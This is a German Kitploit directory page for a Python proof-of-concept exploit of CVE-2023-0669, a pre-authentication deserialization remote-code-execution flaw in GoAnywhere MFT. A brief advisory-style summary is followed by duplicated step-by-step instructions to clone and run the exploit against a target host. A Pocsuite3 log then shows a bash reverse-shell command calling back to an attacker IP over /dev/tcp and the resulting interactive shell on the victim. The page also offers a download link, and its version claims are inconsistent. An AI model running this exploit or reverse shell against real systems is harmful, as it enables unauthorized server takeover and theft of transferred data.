Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Deserialisierungs-Sicherheitslücken Python RCE PoC(Machbarkeitsnachweis) | Kitploit
Tools/GitHubGitHub/avento/cve-2023-0669
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Deserialisierungs-Sicherheitslücken Python RCE PoC(Machbarkeitsnachweis)

Repository anzeigen
83vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-0669 GoAnywhere MFT Deserialisierung – Je Yiuwais Blog

CVE-2023-0669

CVE-2023-0669 ist eine Deserialisierungsschwachstelle in GoAnywhere MFT. Aufgrund der Deserialisierung eines willkürlich vom Angreifer kontrollierten Objekts existiert im License Response Servlet eine vorauthentifizierte Command-Injection-Schwachstelle. Ein Angreifer kann diese Schwachstelle ausnutzen, um beliebigen Code auf dem betroffenen System auszuführen und dadurch die vollständige Kontrolle über das System zu erlangen. Die Schwachstelle betrifft Versionen vor 7.1.2, 7.1.2 nicht eingeschlossen.

CVE-2023-0669 ist eine Deserialisierungsschwachstelle in GoAnywhere MFT, die im License Response Servlet aufgrund einer vorauthentifizierten Command-Injection-Schwachstelle besteht. Ein Angreifer kann diese Schwachstelle ausnutzen, um beliebigen Code auf dem betroffenen System auszuführen, indem er ein vom Angreifer kontrolliertes Objekt deserialisiert. Die Schwachstelle betrifft Versionen vor 7.1.2.

Diese Schwachstelle stellt eine ernsthafte Bedrohung für die Sicherheit der Unternehmensdateiübertragungssoftware GoAnywhere MFT dar. Angreifer können sie ausnutzen, um sensible Daten zu stehlen, Daten zu manipulieren, Systeme zu kompromittieren usw. Daher müssen Benutzer rechtzeitig Maßnahmen ergreifen, um die Systemsicherheit zu schützen.

Das offizielle Sicherheitsbulletin wurde veröffentlicht und bietet erste Überprüfungsmethoden. Benutzer können in den Protokollen unter userdata/logs nach bestimmten Zeichenfolgen suchen, um festzustellen, ob ihr System von dieser Schwachstelle betroffen ist. Falls keine Patches installiert werden können, wird empfohlen, andere Sicherheitsmaßnahmen zu ergreifen, um das System zu schützen.

Zusammenfassend ist CVE-2023-0669 eine Deserialisierungsschwachstelle, die die Aufmerksamkeit der Benutzer erfordert. Benutzer sollten zeitnah auf die neueste Version aktualisieren und prüfen, ob ihr System von dieser Schwachstelle betroffen ist. Darüber hinaus wird empfohlen, das Sicherheitsmanagement von Unternehmenssoftware wie GoAnywhere MFT zu verstärken und mehrschichtige Sicherheitsmaßnahmen zu ergreifen, um die Systeme zu schützen.

CVE-2023-0669 PoC

Einführung

Dieser Exploit ist ein Python-Skript, das die Schwachstelle CVE-2023-0669 in GoAnywhere MFT v6.7.9594 und früheren Versionen ausnutzt.

Beschreibung der Schwachstelle

Diese Schwachstelle besteht aufgrund eines Sicherheitsproblems bei der Verarbeitung von verschlüsselten Bundle-Anfragen in GoAnywhere MFT. Ein Angreifer kann eine speziell gestaltete Anfrage senden und beliebigen Code auf dem Zielserver ausführen.

Verwendung

  1. Klonen Sie dieses Repository.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Wechseln Sie in das CVE-2023-0669-Verzeichnis.
root@kitploit:~
cd CVE-2023-0669
  1. Installieren Sie die Abhängigkeiten requests und cryptography.
root@kitploit:~
pip install requests cryptography
  1. Führen Sie den Exploit aus.
root@kitploit:~
python CVE-2023-0669.py --host <Zielserver-IP>

Hinweise

  • Die Ausführung dieses Exploits erfordert legitime Zugriffsrechte und sollte nicht für illegale Zwecke verwendet werden.
  • Da die Ausführung dieses Exploits ein Risiko für den Zielserver darstellt, ist der Benutzer allein für die Risiken und Konsequenzen verantwortlich.

Einführung

Dieser Exploit ist ein Python-Skript, das die Schwachstelle CVE-2023-0669 in GoAnywhere MFT v6.7.9594 und früheren Versionen ausnutzt.

Beschreibung der Schwachstelle

Diese Schwachstelle besteht aufgrund eines Sicherheitsproblems bei der Verarbeitung von verschlüsselten Bundle-Anfragen in GoAnywhere MFT. Ein Angreifer kann eine speziell gestaltete Anfrage senden und beliebigen Code auf dem Zielserver ausführen.

Verwendung

  1. Klonen Sie dieses Repository.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Wechseln Sie in das Verzeichnis.
root@kitploit:~
cd CVE-2023-0669
  1. Installieren Sie die Abhängigkeiten requests und cryptography.
root@kitploit:~
pip install requests cryptography
  1. Führen Sie den Exploit aus.
root@kitploit:~
python CVE-2023-0669.py --host <Ziel-IP>

Hinweis

  • Die Ausführung dieses Exploits erfordert legitime Zugriffsrechte und sollte nicht für illegale Zwecke verwendet werden.
  • Da die Ausführung dieses Exploits ein Risiko für den Zielserver darstellt, ist der Benutzer allein für die Risiken und Konsequenzen verantwortlich.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Autor: Je Yiuwai bearbeitet von xiaomi pad 6 pro

Tool herunterladen